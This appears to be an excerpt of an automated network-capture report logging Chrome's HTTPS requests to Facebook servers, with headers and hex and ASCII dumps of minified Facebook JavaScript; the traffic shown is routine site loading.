                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 66 6f 72 45 61 63 68 4f 62 6a 65 63 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 64 3b 67 2e 63 61 6c 6c 28 61 2c 65 29 26 26 62 2e 63 61 6c 6c 28 63 2c 61 5b 65 5d 2c 65 2c 61 29 7d 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 73 69 63 56 65 63 74 6f 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);__d("BasicVector",[],(function(a,b,c,d,e,f)
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC8350INData Raw: 63 2c 73 74 61 72 74 54 69 6d 65 3a 65 2c 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 3a 67 2c 73 6f 72 74 49 6e 64 65 78 3a 2d 31 7d 3b 65 3e 66 3f 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 65 2c 6c 28 74 2c 63 29 2c 6e 75 6c 6c 3d 3d 3d 6d 28 73 29 26 26 63 3d 3d 3d 6d 28 74 29 26 26 28 7a 3f 28 42 28 47 29 2c 47 3d 2d 31 29 3a 7a 3d 21 30 2c 4f 28 45 2c 65 2d 66 29 29 29 3a 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 67 2c 6c 28 73 2c 63 29 2c 79 7c 7c 78 7c 7c 28 79 3d 21 30 2c 4e 28 29 29 29 3b 72 65 74 75 72 6e 20 63 7d 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 73 68 6f 75 6c 64 59 69 65 6c 64 3d 4a 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 77 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: c,startTime:e,expirationTime:g,sortIndex:-1};e>f?(c.sortIndex=e,l(t,c),null===m(s)&&c===m(t)&&(z?(B(G),G=-1):z=!0,O(E,e-f))):(c.sortIndex=g,l(s,c),y||x||(y=!0,N()));return c};h.unstable_shouldYield=J;h.unstable_wrapCallback=function(c){var d=w;return func


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                63192.168.2.449812157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC592OUTGET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: sM5EmPOSTNCaG7HHvhTjEQ==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 17:13:36 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: vB/S/1CmPUxy0vOMJWZKyRHk9mWUSe53gzRRI/OnNLblfybF6q8slk6Vk5iDWTGZIymN6m7U2Lg0cRO4EpCKkg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49381
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15862INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 74 69 6c 6c 65 72 79 53 65 67 6d 65 6e 74 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 63 72 3a 39 39 38 35 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 76 61 72 20 69 3d 30 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 7c 7c 68 28 30 2c 31 34 39 36 29 2c 22 63 61 74 65 67 6f 72 79 22 69 6e 20 61 26 26 22 64 65 73 63 72 69 70 74 69 6f 6e 22 69 6e 20 61 7c 7c 68 28 30 2c 33 31 33 38 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 2c 74 68 69 73 2e 24 31 3d 21 31 2c 74 68 69 73 2e 24 32 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 69 64 3a
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 34 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 33 61 5c 75 30 34 34 36 5c 75 30 34 33 38 5c 75 30 34 34 65 20 49 6e 73 74 61 67 72 61 6d 20 5c 75 30 34 33 38 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 34 63 20 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 33 39 2d 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 30 5c 75 30 34 33 61 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 34 32 2c 20 5c 75 30 34 34 64 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 34 38 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75
                                                                                                                                                                                                                                Data Ascii: 4\u0443\u043d\u043a\u0446\u0438\u044e Instagram \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0447\u0435\u0439-\u0442\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442, \u044d\u0442\u043e \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 28 61 2e 70 6f 6c 69 63 79 2e 73 3d 3d 3d 31 29 7b 61 2e 74 61 67 73 3d 64 28 22 46 61 6c 63 6f 55 74 69 6c 73 22 29 2e 78 6f 72 42 69 74 6d 61 70 28 28 62 3d 61 2e 74 61 67 73 29 21 3d 6e 75 6c 6c 3f 62 3a 5b 30 2c 30 5d 2c 77 29 3b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 24 28 61 29 7b 69 66 28 61 3d 3d 3d 22 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 68 61 73 28 61 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 61 29 3b 65 6c 73 65 7b 76 61 72 20 62 3d 7b 63 6c 61 69 6d 3a 22 22 7d 2c 63 3d 61 2e 73 70 6c 69 74 28 22 5e 23 22 29 3b 69 66 28 63 2e 6c 65 6e 67 74 68 3e 3d 34 29 7b 76 61 72 20 64 3d 63 5b 30 5d 2c 65 3d 63 5b 31 5d 2c 66 3d 63 5b 32 5d 3b 63 3d 63 5b 33 5d 3b 66 21 3d 3d 22 22 3f 62 3d
                                                                                                                                                                                                                                Data Ascii: (a.policy.s===1){a.tags=d("FalcoUtils").xorBitmap((b=a.tags)!=null?b:[0,0],w);return!0}return!1}function $(a){if(a==="")return null;if(t.has(a))return t.get(a);else{var b={claim:""},c=a.split("^#");if(c.length>=4){var d=c[0],e=c[1],f=c[2];c=c[3];f!==""?b=
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC750INData Raw: 73 65 6e 64 28 29 7d 3b 69 66 28 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 69 73 4f 6e 6c 69 6e 65 28 29 29 6b 28 29 3b 65 6c 73 65 7b 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6f 6e 6c 69 6e 65 3b 61 26 26 28 6b 28 29 2c 67 2e 72 65 6d 6f 76 65 28 29 29 7d 3b 67 3d 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 6f 6e 43 68 61 6e 67 65 28 66 29 7d 7d 7d 2c 63 6c 65 61 6e 4f 6e 4c 6f 67 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 64 28 22 57 65 62 53 74 6f 72 61 67 65 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 22 29 2e 73 65 74 4c 61 73 74 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 28 62 29 3b 63 28 22 43 61 63 68 65 53 74 6f 72 61 67 65 22 29 2e 64 69 73 61 62 6c 65 50 65 72 73 69 73 74 65 6e 74 57 72 69 74 65 73 28
                                                                                                                                                                                                                                Data Ascii: send()};if(c("NetworkStatus").isOnline())k();else{f=function(a){a=a.online;a&&(k(),g.remove())};g=c("NetworkStatus").onChange(f)}}},cleanOnLogout:function(a,b){d("WebStorageCleanupReason").setLastCleanupReason(b);c("CacheStorage").disablePersistentWrites(


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                64192.168.2.449760157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1188OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=1&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 914
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5MFrhrt7S4CHurFA
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC914OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 35 4d 46 72 68 72 74 37 53 34 43 48 75 72 46 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 36 32 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 35 4d 46 72 68 72 74 37 53 34 43 48 75 72 46 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 75 73 65 72 22 3a 22 30 22 2c 22 77 65 62 53 65 73 73 69 6f 6e 49 64 22 3a 22 66 63 6d 6a 6b 79 3a 6f 37 36 65 6a 62 3a 39 35 6e 68 6a 64 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31
                                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundary5MFrhrt7S4CHurFAContent-Disposition: form-data; name="ts"1727585662374------WebKitFormBoundary5MFrhrt7S4CHurFAContent-Disposition: form-data; name="q"[{"user":"0","webSessionId":"fcmjky:o76ejb:95nhjd","app_id":"256281
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923924379031426", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923924379031426"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1925INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                65192.168.2.449816157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC374OUTGET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ubkaRKiel1rYqBTqhjr0kQ==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: s+qWajxrVjsDCgd3NAvS22cRb38EpIDgWInSz1Poohw0qGXzHhGP3ESwA6D6+CO9u4bYbKHjpNSvuc/tOOGNOA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:23 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 28815
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 41 64 61 70 74 65 72 22 2c 5b 22 63 72 3a 35 38 36 36 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 35 38 36 36 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 43 6f 6e 73 74 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 53 45 4e 44 3a 22 42 61 6e 7a 61 69 3a 53 45 4e 44 22 2c 4f 4b 3a 22 42 61 6e 7a 61 69 3a 4f 4b 22 2c 45 52 52 4f 52 3a 22 42 61 6e 7a 61 69 3a 45 52 52 4f 52 22 2c 53 48 55 54 44 4f 57 4e 3a 22 42 61 6e 7a 61 69 3a 53 48 55 54 44 4f 57 4e 22 2c 42 41 53 49 43 3a 22 62 61 73 69 63 22 2c 56 49 54
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VIT
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC12942INData Raw: 65 3d 73 28 61 2c 6a 2c 68 2d 6a 2c 64 2c 65 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 63 29 7b 64 6f 20 62 5b 63 5d 3d 61 26 31 32 37 2c 61 3d 61 3e 3e 3e 37 2c 61 3e 30 26 26 28 62 5b 63 5d 2b 3d 31 32 38 29 2c 63 2b 3d 31 3b 77 68 69 6c 65 28 61 3e 30 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 74 68 69 73 2e 61 72 72 61 79 3d 61 7d 78 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 78 43 6f 6d 70 72 65 73 73 65 64 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 20 33 32 2b 61 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 2f 36 29 7d 3b 78 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 72 65 73 73 54 6f 42
                                                                                                                                                                                                                                Data Ascii: e=s(a,j,h-j,d,e));return e}function w(a,b,c){do b[c]=a&127,a=a>>>7,a>0&&(b[c]+=128),c+=1;while(a>0);return c}function x(a){this.array=a}x.prototype.maxCompressedLength=function(){var a=this.array.length;return 32+a+Math.floor(a/6)};x.prototype.compressToB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                66192.168.2.449817157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC592OUTGET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
